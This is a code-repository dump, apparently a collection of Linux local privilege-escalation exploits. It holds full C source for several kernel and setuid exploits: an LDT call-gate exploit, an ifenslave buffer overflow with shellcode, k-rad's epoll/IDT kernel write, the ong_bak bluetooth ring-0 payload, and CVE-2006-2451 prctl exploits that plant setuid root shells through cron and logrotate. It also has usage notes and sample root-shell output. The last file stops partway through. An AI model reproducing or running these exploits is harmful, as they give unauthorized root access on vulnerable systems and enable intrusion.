| if (modify_ldt(1, &l, sizeof(l)) == -1) 174 | fatal("Unable to set up LDT"); 175 | find(m); 176 | } 177 | asmlinkage void kernel(unsigned * task) 178 | { 179 | unsigned * addr = task; 180 | /* looking for uids */ 181 | while (addr[0] != uid || addr[1] != uid || 182 | addr[2] != uid || addr[3] != uid) 183 | addr++; 184 | addr[0] = addr[1] = addr[2] = addr[3] = 0; /* uids */ 185 | addr[4] = addr[5] = addr[6] = addr[7] = 0; /* uids */ 186 | addr[8] = 0; 187 | /* looking for vma */ 188 | for (addr = (unsigned *) task_size; addr; addr++) { 189 | if (addr[0] >= task_size && addr[1] < task_size && 190 | addr[2] == address && addr[3] >= task_size) { 191 | addr[2] = task_size - PAGE_SIZE; 192 | addr = (unsigned *) addr[3]; 193 | addr[1] = task_size - PAGE_SIZE; 194 | addr[2] = task_size; 195 | break; 196 | } 197 | } 198 | } 199 | void kcode(void); 200 | #define __str(s) #s 201 | #define str(s) __str(s) 202 | void __kcode(void) 203 | { 204 | asm( 205 | "kcode: \n" 206 | " pusha \n" 207 | " pushl %es \n" 208 | " pushl %ds \n" 209 | " movl $(" str(DS) ") ,%edx \n" 210 | " movl %edx,%es \n" 211 | " movl %edx,%ds \n" 212 | " movl $0xffffe000,%eax \n" 213 | " andl %esp,%eax \n" 214 | " pushl %eax \n" 215 | " call kernel \n" 216 | " addl $4, %esp \n" 217 | " popl %ds \n" 218 | " popl %es \n" 219 | " popa \n" 220 | " lret \n" 221 | ); 222 | } 223 | void knockout(void) 224 | { 225 | unsigned * addr = (unsigned *) address; 226 | if (mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE) == -1) 227 | fatal("Unable to change page protection"); 228 | errno = ESRCH; 229 | if (addr[ENTRY_MAGIC] != MAGIC) 230 | fatal("Invalid LDT entry"); 231 | /* setting call gate and privileged descriptors */ 232 | addr[ENTRY_GATE+0] = ((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU); 233 | addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U; 234 | addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */ 235 | addr[ENTRY_CS+1] = 0x00cf9a00U; 236 | addr[ENTRY_DS+0] = 0x0000ffffU; /* user 4GB code at 0x00000000 */ 237 | addr[ENTRY_DS+1] = 0x00cf9200U; 238 | prepare(); 239 | if (setjmp(jmp) != 0) { 240 | errno = ENOEXEC; 241 | fatal("Unable to jump to call gate"); 242 | } 243 | asm("lcall $" str(GATE) ",$0x0"); /* this is it */ 244 | } 245 | void shell(void) 246 | { 247 | char * argv[] = { _PATH_BSHELL, NULL }; 248 | execve(_PATH_BSHELL, argv, environ); 249 | fatal("Unable to spawn shell\n"); 250 | } 251 | void remap(void) 252 | { 253 | static char stack[8 MB]; /* new stack */ 254 | static char * envp[] = { "PATH=" _PATH_STDPATH, NULL }; 255 | static unsigned * m; 256 | static unsigned b; 257 | m = (unsigned *) sbrk(map_size); 258 | if (!m) 259 | fatal("Unable to allocate memory"); 260 | environ = envp; 261 | asm ("movl %0, %%esp\n" : : "a" (stack + sizeof(stack))); 262 | b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) & PAGE_MASK; 263 | if (munmap((void*)b, task_size - b) == -1) 264 | fatal("Unable to unmap stack"); 265 | while (b < task_size) { 266 | if (sbrk(PAGE_SIZE) == NULL) 267 | fatal("Unable to expand BSS"); 268 | b += PAGE_SIZE; 269 | } 270 | ldt(m); 271 | expand(); 272 | knockout(); 273 | shell(); 274 | } 275 | int main(void) 276 | { 277 | configure(); 278 | remap(); 279 | return EXIT_FAILURE; 280 | } 281 | -------------------------------------------------------------------------------- /ifenslave.c: -------------------------------------------------------------------------------- 1 | /* 2 | * lame local /sbin/ifenslave buffer overrun exploit 3 | * tested on redhat 8.0 4 | * by v1pee//nerf, nerf.ru 5 | * v1pee@ngs.ru 6 | */ 7 | 8 | #include 9 | 10 | char shellcode[] = 11 | "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" 12 | "\x31\xc0\x50\x50\xb0\xb5\xcd\x80" 13 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 14 | "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 15 | "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 16 | 17 | long getsp() { 18 | __asm__("movl %esp,%eax"); 19 | } 20 | 21 | int 22 | main(int argc, char *argv[]) { 23 | 24 | char *buffer, *shity, *ptr; 25 | long *addr_ptr, addr; 26 | int i, offset=0; 27 | int bufsize=128; 28 | int eggsize=512; 29 | 30 | if (argc > 1) offset = atoi(argv[1]); 31 | if (argc > 2) eggsize = atoi(argv[2]); 32 | 33 | buffer = malloc(bufsize); 34 | shity = malloc(eggsize); 35 | 36 | addr = getsp() - offset; 37 | printf("local /sbin/ifenslave exploit (red hat 8.0)\n"); 38 | printf("RET: 0x%x\nOffset: %d\n", addr,offset); 39 | ptr = buffer; 40 | 41 | addr_ptr = (long *) ptr; 42 | 43 | // fills rets 44 | for (i = 0; i < bufsize; i+=4) 45 | *(addr_ptr++) = addr; 46 | 47 | ptr = shity; 48 | 49 | // fills NOP instructions in 50 | for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) 51 | *(ptr++) = 0x41; 52 | 53 | // fills shellcode 54 | for (i = 0; i < strlen(shellcode); i++) 55 | *(ptr++) = shellcode[i]; 56 | 57 | setenv("EGG",shity,4); // consists of nops and shellcode 58 | setenv("XXX",buffer,4); // consists of addrs to new envp 59 | 60 | system("/sbin/ifenslave -a $XXX"); 61 | } 62 | 63 | 64 | -------------------------------------------------------------------------------- /ifenslave.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/ifenslave.zip -------------------------------------------------------------------------------- /k-rad.c: -------------------------------------------------------------------------------- 1 | /* 2 | * k-rad.c - linux 2.6.11 and below CPL 0 kernel exploit v2 3 | * Discovered and exploit coded Jan 2005 by sd 4 | * 5 | * In memory of pwned.c (uselib) 6 | * 7 | * - Redistributions of source code is not permitted. 8 | * - Redistributions in the binary form is not permitted. 9 | * - Redistributions of the above copyright notice, this list of conditions, 10 | * and the following disclaimer is permitted. 11 | * - By proceeding to a Redistribution and under any form of the Program 12 | * the Distributor is granting ownership of his Resources without 13 | * limitations to the copyright holder(s). 14 | * 15 | * 16 | * Since we already owned everyone, theres no point keeping this private 17 | * anymore. 18 | * 19 | * http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html 20 | * 21 | * Thanks to our internet hero georgi guninski for being such incredible 22 | * whitehat disclosing one of the most reliable kernel bugs. 23 | * You saved the world, man, we owe you one! 24 | * 25 | * This version is somewhat broken, but skilled reader will get an idea. 26 | * Well, at least let the scriptkids have fun for a while. 27 | * 28 | * Thanks to all who helped me developing/testing this, you know who you are, 29 | * and especially to my gf for guidance while coding this. 30 | * 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #define __USE_GNU 43 | #include 44 | #include 45 | #include 46 | #include 47 | 48 | 49 | #define KRS "\033[1;30m[ \033[1;37m" 50 | #define KRE "\033[1;30m ]\033[0m" 51 | #define KRAD "\033[1;30m[\033[1;37m*\033[1;30m]\033[0m " 52 | #define KRADP "\033[1;30m[\033[1;37m+\033[1;30m]\033[0m " 53 | #define KRADM "\033[1;30m[\033[1;37m-\033[1;30m]\033[0m " 54 | 55 | #define MAP (0xfffff000 - (1023*4096)) 56 | #define MAP_PAE (0xfffff000 - (511*4096)) 57 | #define MKPTE(addr) ((addr & (~4095)) | 0x27) 58 | 59 | #define SET_IDT_GATE(idt,ring,s,addr) \ 60 | (idt).off1 = addr & 0xffff; \ 61 | (idt).off2 = addr >> 16; \ 62 | (idt).sel = s; \ 63 | (idt).none = 0; \ 64 | (idt).flags = 0x8E | (ring << 5); \ 65 | 66 | struct idtr { 67 | unsigned short limit; 68 | unsigned int base; 69 | } __attribute__ ((packed)); 70 | 71 | struct idt { 72 | unsigned short off1; 73 | unsigned short sel; 74 | unsigned char none,flags; 75 | unsigned short off2; 76 | } __attribute__ ((packed)); 77 | 78 | unsigned long long *clear1, *clear2; 79 | 80 | #define __syscall_return(type, res) \ 81 | do { \ 82 | if ((unsigned long)(res) >= (unsigned long)(-125)) { \ 83 | errno = -(res); \ 84 | res = -1; \ 85 | } \ 86 | return (type) (res); \ 87 | } while (0) 88 | 89 | #define _capget_macro(type,name,type1,arg1,type2,arg2) \ 90 | type name(type1 arg1,type2 arg2) \ 91 | { \ 92 | long __res; \ 93 | __asm__ volatile ( "int $0x80" \ 94 | : "=a" (__res) \ 95 | : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \ 96 | __syscall_return(type,__res); \ 97 | } 98 | 99 | static inline _capget_macro(int,capget,void *,a,void *,b); 100 | void raise_cap(unsigned long *ts) 101 | { 102 | /* must be on lower addresses because of kernel arg check :) */ 103 | static struct __user_cap_header_struct head; 104 | static struct __user_cap_data_struct data; 105 | static struct __user_cap_data_struct n; 106 | int i; 107 | 108 | *clear1 = 0; 109 | *clear2 = 0; 110 | head.version = 0x19980330; 111 | head.pid = 0; 112 | capget(&head, &data); 113 | /* scan the thread_struct */ 114 | for (i = 0; i < 512; i++, ts++) { 115 | /* is it capabilities block? */ 116 | if ((ts[0] == data.effective) && 117 | (ts[1] == data.inheritable) && 118 | (ts[2] == data.permitted)) { 119 | /* set effective cap to some val */ 120 | ts[0] = 0x12341234; 121 | capget(&head, &n); 122 | /* and test if it has changed */ 123 | if (n.effective == ts[0]) { 124 | /* if so, we're in :) */ 125 | ts[0] = ts[1] = ts[2] = 0xffffffff; 126 | return; 127 | } 128 | /* otherwise fix back the stuff 129 | (if we've not crashed already :) */ 130 | ts[0] = data.effective; 131 | } 132 | } 133 | return; 134 | } 135 | 136 | extern void stub; 137 | asm ( 138 | "stub:;" 139 | " pusha;" 140 | " mov $-8192, %eax;" 141 | " and %esp, %eax;" 142 | " pushl (%eax);" 143 | " call raise_cap;" 144 | " pop %eax;" 145 | " popa;" 146 | " iret;" 147 | ); 148 | 149 | /* write to kernel from buf, num bytes */ 150 | #define DIV 256 151 | #define RES 4 152 | int kwrite(unsigned base, char *buf, int num) 153 | { 154 | int efd, c, i, fd; 155 | int pi[2]; 156 | struct epoll_event ev; 157 | int *stab; 158 | unsigned long ptr; 159 | int count; 160 | unsigned magic = 0xffffffff / 12 + 1; 161 | 162 | /* initialize epoll */ 163 | efd = epoll_create(4096); 164 | if (efd < 0) 165 | return -1; 166 | ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP; 167 | 168 | /* 12 bytes per fd + one more to be safely in stack space */ 169 | count = (num+11)/12+RES; 170 | 171 | /* desc array */ 172 | stab = alloca((count+DIV-1)/DIV*sizeof(int)); 173 | for (i = 0; i < ((count+DIV-1)/DIV)+1; i++) { 174 | if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pi) < 0) 175 | return -1; 176 | send(pi[0], "a", 1, 0); 177 | stab[i] = pi[1]; 178 | } 179 | /* highest fd and first descriptor */ 180 | fd = pi[1]; 181 | /* we've to allocate this separately because we need to have 182 | it's fd preserved - using this we'll be writing actual bytes */ 183 | epoll_ctl(efd, EPOLL_CTL_ADD, fd, &ev); 184 | for (i = 0, c = 0; i < (count-1); i++) { 185 | int n; 186 | n = dup2(stab[i/DIV], fd+2+(i % DIV)); 187 | if (n < 0) 188 | return -1; 189 | epoll_ctl(efd, EPOLL_CTL_ADD, n, &ev); 190 | close(n); 191 | } 192 | /* in 'n' we've the latest fd we're using to write data */ 193 | for (i = 0; i < ((num+7)/8); i++) { 194 | /* data being written from end */ 195 | memcpy(&ev.data, buf + num - 8 - i * 8, 8); 196 | epoll_ctl(efd, EPOLL_CTL_MOD, fd, &ev); 197 | 198 | /* the actual kernel magic */ 199 | ptr = (base + num - (i*8)) - (count * 12); 200 | epoll_wait(efd, (void *) ptr, magic, 31337); 201 | /* don't ask why (rotten rb-trees) :) */ 202 | if (i) 203 | epoll_wait(efd, (void *)ptr, magic, 31337); 204 | } 205 | 206 | close(efd); 207 | for (i = 3; i <= fd; i++) 208 | close(i); 209 | return 0; 210 | } 211 | 212 | /* real-mode interrupt table fixup - point all interrupts to iret. 213 | let's hope this will shut up apm */ 214 | void fixint(char *buf) 215 | { 216 | unsigned *tab = (void *) buf; 217 | int i; 218 | 219 | for (i = 0; i < 256; i++) 220 | tab[i] = 0x0000400; /* 0000:0400h */ 221 | /* iret */ 222 | buf[0x400] = 0xcf; 223 | } 224 | 225 | /* establish pte pointing to virtual addr 'addr' */ 226 | int map_pte(unsigned base, int pagenr, unsigned addr) 227 | { 228 | unsigned *buf = alloca(pagenr * 4096 + 8); 229 | buf[pagenr * 1024] = MKPTE(addr); 230 | buf[pagenr * 1024+1] = 0; 231 | fixint((void *)buf); 232 | return kwrite(base, (void *)buf, pagenr * 4096 + 4); 233 | } 234 | 235 | void error(int d) 236 | { 237 | printf(KRADM "y3r 422 12 n07 3r337 3nuPh!\n" 238 | KRAD "Try increase nrpages?\n"); 239 | exit(1); 240 | } 241 | 242 | int exploit(char *top, int npages, int pae) 243 | { 244 | struct idt *idt; 245 | struct idtr idtr; 246 | unsigned base; 247 | char *argv[] = { "k-rad", NULL }; 248 | char *envp[] = { "TERM=linux", "PS1=k-rad\\$", "BASH_HISTORY=/dev/null", 249 | "HISTORY=/dev/null", "history=/dev/null", 250 | "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/ 251 | local/bin:/usr/local/sbin", NULL }; 252 | 253 | signal(SIGSEGV, error); 254 | signal(SIGBUS, error); 255 | 256 | /* first compute kernel base */ 257 | base = (unsigned long) top; 258 | base += 0x0fffffff; 259 | base &= 0xf0000000; 260 | 261 | /* get idt descriptor addr */ 262 | asm ("sidt %0" : "=m" (idtr)); 263 | 264 | /* get the pte in */ 265 | map_pte(base, npages, idtr.base - base); 266 | 267 | idt = pae?(void *)MAP_PAE:(void *)MAP; 268 | 269 | /* cleanup the stuff to prevent others spotting the gate 270 | - must be done from ring 0 */ 271 | clear1 = (void *) &idt[0x7f]; 272 | clear2 = (void *) (base + npages * 4096); 273 | 274 | SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub)); 275 | 276 | /* call raise_cap */ 277 | asm ("int $0x7f"); 278 | 279 | printf(KRADP "j00 1u(k7 k1d!\n"); 280 | setresuid(0, 0, 0); 281 | setresgid(0, 0, 0); 282 | execve("/bin/sh", argv, envp); 283 | exit(0); 284 | } 285 | 286 | int main(int argc, char **argv) 287 | { 288 | char eater[65536]; 289 | int npages = 1; 290 | 291 | /* unlink(argv[0]); */ 292 | // sync(); 293 | printf(KRS " k-rad.c - linux 2.6.* CPL 0 kernel exploit " KRE "\n" 294 | KRS "Discovered Jan 2005 by sd " KRE "\n"); 295 | if (argc == 2) { 296 | npages = atoi(argv[1]); 297 | if (!npages) { 298 | printf(KRADM "Use: %s [number of pages]\n" 299 | "Increase from 1 to 5, use negative number for pae (from -1 to -5).\n" 300 | "The higher number the more likely it will crash\n", argv[0]); 301 | return 1; 302 | } 303 | printf(KRAD "Overwriting %d pages\n", npages<0?-npages:npages); 304 | } 305 | 306 | exploit(eater, npages<0?-npages:npages,npages<0); 307 | return 0; 308 | } -------------------------------------------------------------------------------- /k-rad3.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/k-rad3.zip -------------------------------------------------------------------------------- /kmod.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/kmod.zip -------------------------------------------------------------------------------- /kmod2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/kmod2.zip -------------------------------------------------------------------------------- /krad.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/krad.zip -------------------------------------------------------------------------------- /krad2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/krad2.zip -------------------------------------------------------------------------------- /loginx.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/loginx.zip -------------------------------------------------------------------------------- /mremap_pte.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/mremap_pte.zip -------------------------------------------------------------------------------- /myptrace.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/myptrace.zip -------------------------------------------------------------------------------- /newlocal.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/newlocal.zip -------------------------------------------------------------------------------- /nslconf.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/nslconf.zip -------------------------------------------------------------------------------- /ohMy-another-efs.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/ohMy-another-efs.zip -------------------------------------------------------------------------------- /ong_bak.c: -------------------------------------------------------------------------------- 1 | /* 2 | ONG_BAK v0.3 [april 8th 05] 3 | """"""""""""""""""""""""""""""""" 4 | ong_bak now checks the value of ecx and launches 5 | the exploit in case a suitable value has been found! 6 | 7 | ONG_BAK v0.1 [april 4th 05] 8 | """"""""""""""""""""""""""""""""" 9 | local root exploit for the bluetooth bug 10 | 11 | usage: 12 | 13 | the bug is quite stable so you can't really fuck things up if you stick to 14 | the following: 15 | 16 | play around with the negative argument until ecx points to our data 17 | segment: 18 | 19 | qobaiashi@voyager:~> id 20 | uid=1000(qobaiashi) gid=100(users) 21 | Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users) 22 | qobaiashi@voyager:~> ./ong_bak -1002341 23 | -|-local bluez exploit v.0.3 -by qobaiashi- 24 | | 25 | |- i've found kernel 2.6.4-52-default 26 | |- trying... 27 | |- [ecx: 0b8f0f0f ] 28 | qobaiashi@voyager:~> ./ong_bak -10023411 29 | -|-local bluez exploit v.0.3 -by qobaiashi- 30 | | 31 | |- i've found kernel 2.6.4-52-default 32 | |- trying... 33 | |- [ecx: 0809da40 ] 34 | |- suitable value found!using 0x0809da40 35 | |- the time has come to push the button.. 36 | qobaiashi@voyager:~> id 37 | uid=0(root) gid=0(root) 38 | Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users) 39 | qobaiashi@voyager:~> 40 | 41 | the parent process becomes root. 42 | 43 | that's it. 44 | unfortunately it's not yet very practicable.. 45 | 46 | qobaiashi@u-n-f.com 47 | 48 | */ 49 | 50 | #include 51 | #include 52 | #include 53 | #include 54 | #include 55 | #include 56 | #include 57 | #include 58 | #include 59 | 60 | #define BRKVAL 0x0cec9000 //should be enough but fix it if you get an 61 | error 62 | 63 | void usage(char *path); 64 | 65 | //due to changing task_structs we need different offsets 66 | char k_give_root[] = //----[ give root in ring0/tested on linux2.6.5/x86/ by -q ]-----\\ 67 | "\x90\x90\x90\x90" 68 | "\x90\x90\x90\x90" 69 | "\x31\xc0" // xor %eax,%eax 70 | "\xb8\x00\xe0\xff\xff" // mov $0xffffe000,%eax 71 | "\x21\xe0" // and %esp,%eax 72 | "\x8b\x00" // mov (%eax),%eax 73 | "\x8b\x80\xa4\x00\x00\x00" // mov 0xa4(%eax),%eax 74 | "\xc7\x80\xf0\x01\x00\x00\x00" // movl $0x0,0x1f0(%eax) 75 | "\x00\x00\x00" 76 | "\xc7\x80\xf4\x01\x00\x00\x00" // movl $0x0,0x1f4(%eax) 77 | "\x00\x00\x00" 78 | "\xc7\x80\x00\x02\x00\x00\x00" // movl $0x0,0x200(%eax) 79 | "\x00\x00\x00" 80 | "\xc7\x80\x04\x02\x00\x00\x00" // movl $0x0,0x204(%eax) 81 | "\x00\x00\x00" 82 | "\x31\xc0" // xor %eax,%eax 83 | "\x40" // inc %eax 84 | "\xcd\x80"; // int $0x80 85 | 86 | char k_give_root2[] = //----[ give root in ring0/tested linux2.6.11/x86/ by -q ]-----\\ 87 | "\x90\x90\x90\x90" 88 | "\x90\x90\x90\x90" 89 | "\x31\xc0" // xor %eax,%eax 90 | "\xb8\x00\xe0\xff\xff" // mov $0xffffe000,%eax 91 | "\x21\xe0" // and %esp,%eax 92 | "\x8b\x00" // mov (%eax),%eax 93 | "\x8b\x80\x9c\x00\x00\x00" // mov 0x9c(%eax),%eax 94 | "\xc7\x80\x68\x01\x00\x00\x00" // movl $0x0,0x168(%eax) 95 | "\x00\x00\x00" 96 | "\xc7\x80\x78\x01\x00\x00\x00" // movl $0x0,0x178(%eax) 97 | "\x00\x00\x00" 98 | "\xc7\x80\x6c\x01\x00\x00\x00" // movl $0x0,0x16c(%eax) 99 | "\x00\x00\x00" 100 | "\xc7\x80\x7c\x01\x00\x00\x00" // movl $0x0,0x17c(%eax) 101 | "\x00\x00\x00" 102 | "\x31\xc0" // xor %eax,%eax 103 | "\x40" // inc %eax 104 | "\xcd\x80"; // int $0x80 105 | 106 | main(int argc, char *argv[]) 107 | { 108 | char buf[2048]; 109 | int sock, *mod = (int*)buf; 110 | unsigned int arg; 111 | int tmp; 112 | char *check, *ong_code = 0; 113 | struct utsname vers; 114 | 115 | printf("-|-local bluez exploit v.0.3 -by qobaiashi-\n |\n"); 116 | if (uname(&vers) < 0) 117 | printf(" |- couldn't determine kernel version\n"); 118 | 119 | else 120 | { 121 | printf(" |- i've found kernel %s\n", vers.release); 122 | if(strstr(vers.release, "2.6.11") > 0) ong_code = k_give_root2; 123 | if(strstr(vers.release, "2.6.4") > 0) ong_code = k_give_root; 124 | } 125 | 126 | if (ong_code == 0) 127 | { 128 | printf(" |- no supported version found..trying 2.6.4 code\n"); 129 | ong_code = k_give_root; 130 | } 131 | 132 | if( brk((void*)BRKVAL) == -1 ) 133 | { 134 | printf(" |- brk failed..exiting\n"); 135 | exit(1); 136 | } 137 | 138 | if (argc < 2) 139 | { 140 | usage(argv[0]); 141 | exit(1); 142 | } 143 | 144 | if (argc == 2) 145 | arg = strtoul(argv[1], 0, 0); 146 | 147 | if (argc == 3) 148 | { 149 | arg = strtoul(argv[1], 0, 0); 150 | mod = (unsigned int*)strtoul(argv[2], 0, 0); 151 | } 152 | 153 | if (fork() != 0)//parent watch the Oops 154 | { 155 | //previous Oops printing 156 | usleep(100); 157 | if ((tmp = klogctl(0x3, buf, 1700)) > -1) 158 | { 159 | check = strstr(buf, "ecx: "); 160 | printf(" |- [%0.14s]\n", check); 161 | if (*(check+5) == 0x30 && *(check+6) == 0x38) 162 | { 163 | check+=5; 164 | printf(" |- suitable value found!using 0x%0.9s\n", check); 165 | printf(" |- the time has come to push the button... check your id!\n"); 166 | *(check+9) = 0x00;*(--check) = 'x';*(--check) = '0'; 167 | mod = (unsigned int*)strtoul(check, 0, 0); 168 | for (sock = 0;sock <= 200;sock++) 169 | *(mod++) = (int)ong_code;//link to shellcode 170 | 171 | if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) 172 | { 173 | printf(" |- something went w0rng (invalid value)\n"); 174 | exit(1); 175 | } 176 | 177 | } 178 | } 179 | return 0; 180 | } 181 | 182 | if (fork() == 0)//child does the exploit 183 | { 184 | for (sock = 0;sock <= 200;sock++) 185 | *(mod++) = (int)ong_code;//link to shellcode 186 | 187 | printf(" |- trying...\n"); 188 | if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) 189 | { 190 | printf(" |- something went w0rng (invalid value)\n"); 191 | exit(1); 192 | } 193 | } 194 | 195 | exit(0); 196 | } 197 | 198 | /*****************\ 199 | |** usage **| 200 | \*****************/ 201 | void usage(char *path) 202 | { 203 | printf(" |----------------------------\n"); 204 | printf(" | usage: %s \n", path); 205 | printf(" | tested:\n"); 206 | printf(" | SuSE 9.1: -10023411 \n"); 207 | printf(" | -10029 \n"); 208 | printf(" | Kernel 2.6.11: -10023 \n"); 209 | exit(0); 210 | } 211 | -------------------------------------------------------------------------------- /prct1.c: -------------------------------------------------------------------------------- 1 | /*****************************************************/ 2 | /* Local r00t Exploit for: */ 3 | /* Linux Kernel PRCTL Core Dump Handling */ 4 | /* ( BID 18874 / CVE-2006-2451 ) */ 5 | /* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */ 6 | /* By: */ 7 | /* - dreyer (main PoC code) */ 8 | /* - RoMaNSoFt (local root code) */ 9 | /* [ 10.Jul.2006 ] */ 10 | /*****************************************************/ 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n"; 22 | 23 | int main() { 24 | int child; 25 | struct rlimit corelimit; 26 | printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n"); 27 | printf("By: dreyer & RoMaNSoFt\n"); 28 | printf("[ 10.Jul.2006 ]\n\n"); 29 | 30 | corelimit.rlim_cur = RLIM_INFINITY; 31 | corelimit.rlim_max = RLIM_INFINITY; 32 | setrlimit(RLIMIT_CORE, &corelimit); 33 | 34 | printf("[*] Creating Cron entry\n"); 35 | 36 | if ( !( child = fork() )) { 37 | chdir("/etc/cron.d"); 38 | prctl(PR_SET_DUMPABLE, 2); 39 | sleep(200); 40 | exit(1); 41 | } 42 | 43 | kill(child, SIGSEGV); 44 | 45 | printf("[*] Sleeping for aprox. one minute (** please wait **)\n"); 46 | sleep(62); 47 | 48 | printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n"); 49 | system("/tmp/sh -i"); 50 | } 51 | 52 | // milw0rm.com [2006-07-11] 53 | 54 | -------------------------------------------------------------------------------- /prct1.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/prct1.zip -------------------------------------------------------------------------------- /prct2.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $ 3 | * 4 | * raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate) 5 | * Copyright (c) 2006 Marco Ivaldi 6 | * 7 | * The suid_dumpable support in Linux kernel 2.6.13 up to versions before 8 | * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial 9 | * of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via 10 | * the PR_SET_DUMPABLE argument of the prctl function and a program that causes 11 | * a core dump file to be created in a directory for which the user does not 12 | * have permissions (CVE-2006-2451). 13 | * 14 | * This exploit uses the logrotate attack vector: of course, you must be able 15 | * to chdir() into the /etc/logrotate.d directory in order to exploit the 16 | * vulnerability. I've experimented a bit with other attack vectors as well, 17 | * with no luck: at (/var/spool/atjobs/) uses file name information to 18 | * establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x 19 | * permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled 20 | * coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c). 21 | * 22 | * Thanks to Solar Designer for the interesting discussion on attack vectors. 23 | * 24 | * NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!! 25 | * 26 | * Usage: 27 | * $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall 28 | * [exploit must be statically linked] 29 | * $ ./raptor_prctl2 30 | * [please wait until logrotate is run] 31 | * $ ls -l /tmp/pwned 32 | * -rwsr-xr-x 1 root users 7221 2006-07-18 13:32 /tmp/pwned 33 | * $ /tmp/pwned 34 | * sh-3.00# id 35 | * uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users) 36 | * sh-3.00# 37 | * [don't forget to delete /tmp/pwned!] 38 | * 39 | * Vulnerable platforms: 40 | * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] 41 | */ 42 | 43 | #include 44 | #include 45 | #include 46 | #include 47 | #include 48 | #include 49 | #include 50 | 51 | #define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)" 52 | #define INFO2 "Copyright (c) 2006 Marco Ivaldi " 53 | 54 | char payload[] = /* commands to be executed by privileged logrotate */ 55 | "\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n"; 56 | 57 | char pwnage[] = /* build setuid() helper to circumvent bash checks */ 58 | "echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; 59 | 60 | int main(void) 61 | { 62 | int pid; 63 | struct rlimit corelimit; 64 | 